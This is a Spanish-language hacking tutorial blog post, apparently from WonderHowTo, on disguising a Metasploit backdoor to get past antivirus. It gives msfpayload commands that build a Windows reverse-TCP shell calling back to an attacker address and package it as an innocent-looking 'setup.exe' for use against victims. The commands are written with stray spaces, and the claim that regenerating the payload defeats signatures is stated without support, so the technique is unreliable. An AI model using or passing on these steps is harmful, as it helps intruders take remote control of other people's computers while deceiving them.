BlogWonderHowTo

Hackear como un profesional Cómo eludir el software antivirus ocultando la firma de un exploit

¡Bienvenidos mis compañeros hackers!

En mis últimos artículos, me he concentrado en lo que se llama un oyente, que es básicamente lo mismo que puerta trasera y rootkit, sólo “oyente” suena mucho menos malévolo que los otros dos términos.

Primero, cubrí cómo incrustar un oyente en un documento de Microsoft Office (Excel, PowerPoint, Word, etc.), luego en un archivo PDF de Adobe Reader. En ambos casos, cuando la víctima abre el archivo, se ejecuta un pequeño programa en segundo plano que nos permite conectarnos a su sistema y controlarlo.

El problema

El único problema posible en este escenario es que el programa antivirus de la víctima está activado, está actualizado y detecta nuestro pequeño programa. En ese caso, es poco probable que la víctima abra el archivo y no podemos jugar. Pero, en esta lección, le mostraré cómo transformar al oyente para que sea poco probable que el software antivirus de la víctima lo detecte.

Todo el software antivirus se basa en la idea muy simple de las firmas de malware. Lo que esto significa es que los editores de software antivirus simplemente realizan un seguimiento del aspecto del software malicioso: cuando su software antivirus se actualiza cada día, selecciona todas las firmas nuevas. Cuando detecta algo que se parece a una de estas firmas, alertan al usuario y ponen en cuarentena el software malicioso.

El Exploit

Afortunadamente para nosotros, básicamente podemos cambiar la firma de nuestro software malicioso sin cambiar lo que hace. Simplemente re-codificamos de una manera que el software AV no tiene firma. Bastante simple, ¿no crees?

Bueno. Una vez más, encienda su BackTrack y Metasploit y empecemos a trabajar en una metamorfosis.

Paso 1: Explore Msfpayload

Empecemos por explorar msfpayload como parte de la suite Metasploit. Al escribir msfpayload con el modificador –h, podemos obtener la pantalla de ayuda de este módulo.

msfpayload -h

Observe en la captura de pantalla anterior que la sintaxis de este módulo incluye opciones, la carga útil y luego varios valores que nos permiten codificar la carga útil utilizando varios lenguajes de programación, incluidos C, Perl, Ruby, Raw, VBA y otros.

Msfpayload nos permite convertir el código de la carga útil en cualquiera de estas opciones y así evadir mejor el software AV de la víctima.

Paso 2: generar una carga útil personalizada

Procedamos a generar una carga útil personalizada en C.

msfpayload windows / shell / reverse_tcp -o

Observe que usamos la opción –o y Metasploit muestra nuestras diversas opciones. Para generar el payload personalizado necesitamos pasar las opciones a Metasploit, en este caso el LHOST y el LPORT. Establezcamos esos en nuestra máquina 192.168.100.1 y el LPORT en 4441.

Ahora necesitamos generar una carga útil personalizada en C escribiendo:

msfpayload windows / shell / reverse_tcp LHOST = 192.168.100.1 LPORT = 4441 C

Observe que agregamos el comando con una C mayúscula para indicar que queríamos que la carga útil se generara en C. Como puede ver en la captura de pantalla anterior, Metasploit generó la carga útil en C y nos la mostró.

Paso 3: generar el código binario

Finalmente, necesitamos generar un ejecutable binario para el shellcode que se puede usar en nuestro ataque del lado del cliente.

msfpayload windows / shell / reverse_tcp LHOST = 192.168.100.1 X> setup.exe

Ahora hemos creado un archivo ejecutable usando el X opción y luego envió este archivo a la carpeta actual y nombró el archivo setup.exe. Ahora podemos usar esta nueva carga útil en un ataque del lado del cliente y es poco probable que el software AV de la víctima tenga una firma, lo que nos permitirá colocar sigilosamente esta puerta trasera / oyente en su sistema.

¡Y eso es! Estén atentos para mi próxima lección, donde exploraremos formas de deshabilitar por completo el software AV del cliente.

Foto de portada de Información técnica

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba
Cerrar